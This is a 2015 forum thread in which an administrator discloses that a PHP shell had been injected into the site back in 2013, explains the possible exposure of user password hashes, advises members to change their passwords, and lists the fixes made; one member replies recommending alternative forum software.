Forum Hack ?!? (Nov 2015)

GHDpro

Administrator
Staff member
I guess I should also make this public (mods have known about it for a while).

Some time ago I switched anti-virus software on my PC and when it did a full scan it found malware -- in the backups of the forum.

Somehow a PHP shell was injected into the forum (in a location that was writable by the webserver software) in September 2013. Yes, that long time ago.

However I have no clue who put it there or why. While I do have data backups from that time (confirming the file had indeed been there for that long time), the backups don't include access logs as they consume a lot of disk space.

It's a bit weird that somehow with this much access to the server (not exactly root, but with a PHP shell you can do a lot of damage), they didn't do anything that was actually noticed: the forum hasn't been pwned or hosed or anything.

I suspect the perpetrator may have tried to hack the forum for a specific purpose and didn't find what he was looking for. But that's all speculation.


So what does this all mean?

Well technically this means anyone who knew about the PHP shell could have had full access to all files on the server and full database access. That last bit means theoretically somebody could have had access to all user information including usernames, email addresses, password hashes and salts.

It should be noted that on vBulletin forums (v3 & v4 at least) the kind of hashing done on passwords is ridiculously weak: just MD5 with a salt. Anyone who really wants to can and will be able to crack just about any password encrypted this way.

Now the problem is that we don't know whether the user database was compromised or not, or what really was done at all. So for this reason we have not reset everyone's passwords.

But it is highly recommended you change your password anyway

In addition if you used your forum password and username/email address combination anywhere else you should also change it on those other sites.

Ideally you should of course never ever reuse passwords on any site. Use a password manager like Dashlane, 1Password, KeePass or LastPass.


Does this have anything to do with the recent vBulletin.com hack?

No. This problem was discovered earlier than that. At this point it looks like the problems surrounding that hack involve vBulletin v5 which we fortunately don't use. If it also affects v4 I'll patch the forum as soon as possible, but at this time no such patches have been made available.


What has been done to prevent this from happening again?

The forum server has been completely wiped and reloaded. Also the webserver configuration has been slightly tweaked not to allow execution of PHP in writable folders (so the same trick won't work again). Lastly vBulletin was updated to the latest version (v4.2.3, we were still using a slightly older version before).
 

Touko White

I'm cute, aren't I?
This is exactly why I don't like vBulletin or XenForo much at all. :p

I recommend IP.Board if you need paid software even though that is a lot of money to purchase (£100 for licence I think), or to use something open-source like MyBB which doesn't cost anything to use and is much lighter. :)

Normally I'd say 'AcmlmBoard XD' but it doesn't have loads of features and isn't supported anymore, however no security issues have been found with it.

I'll have to come up with another cryptic password now, irritating.
 
Top